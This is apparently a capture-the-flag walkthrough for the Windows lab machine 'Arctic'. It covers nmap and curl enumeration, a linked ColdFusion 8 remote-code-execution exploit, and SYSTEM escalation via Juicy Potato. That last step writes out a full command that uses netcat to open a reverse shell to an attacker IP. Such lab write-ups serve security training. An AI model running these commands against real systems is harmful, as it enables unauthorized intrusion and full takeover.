Introduction

OS: Windows
Difficulty: Easy
Points: 0
Release: 22 Mar, 2017
IP: 10.10.10.11

Enumeration

Nmap scan result

1
2
3
4
5
6
7
8
9
10
11
Nmap scan report for 10.10.10.11
Host is up (0.055s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.31 seconds

After we enumurate the 8500 port we found two folders

  • CFIDE/
  • cfdocs/
1
2
3
4
5
6
7
8
9
10
11
12
13
$ curl http://10.10.10.11:8500 -i
HTTP/1.0 200 OK
Date: Thu, 14 Sep 2023 17:32:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server

<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a>               <i>dir</i>   03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a>              <i>dir</i>   03/22/17 08:55 μμ
</pre><hr></html>

User Flag

After some enumeration we found the Adobe ColdFusion 8 in the machine.
imgFound the RCE exploit for the same version https://www.exploit-db.com/exploits/50057
Using the exploit we got shell as tolis

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\>whoami
whoami
arctic\tolis

C:\>dir "user.txt" /s
dir "user.txt" /s
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\tolis\Desktop

14/09/2023  08:28                 34 user.txt
               1 File(s)             34 bytes

Got the user flag.

Root Flag

tolis user account has SeImpersonatePrivilege enabled

1
2
3
4
5
6
7
8
9
C:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled, we can use this for elevate the local privileges to System. Normally, these privileges are assigned to service users, admins, and local systems — high integrity elevated users.

To escalate to system, we are going to using the Juicy Potato: https://github.com/ohpe/juicy-potato/releases

Command used to get shell
JuicyPotato.exe -l 1337 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p c:\windows\system32\cmd.exe -a "/c c:\users\tolis\desktop\nc64.exe -e cmd.exe 10.10.1x.xx 1234" -t *
After executing the above command we got the shell as nt authority\system

1
2
3
4
5
C:\>whoami
nt authority\system

C:\>type users\administrator\desktop\root.txt
dcf80b472exxxxx.....

Got the root flag.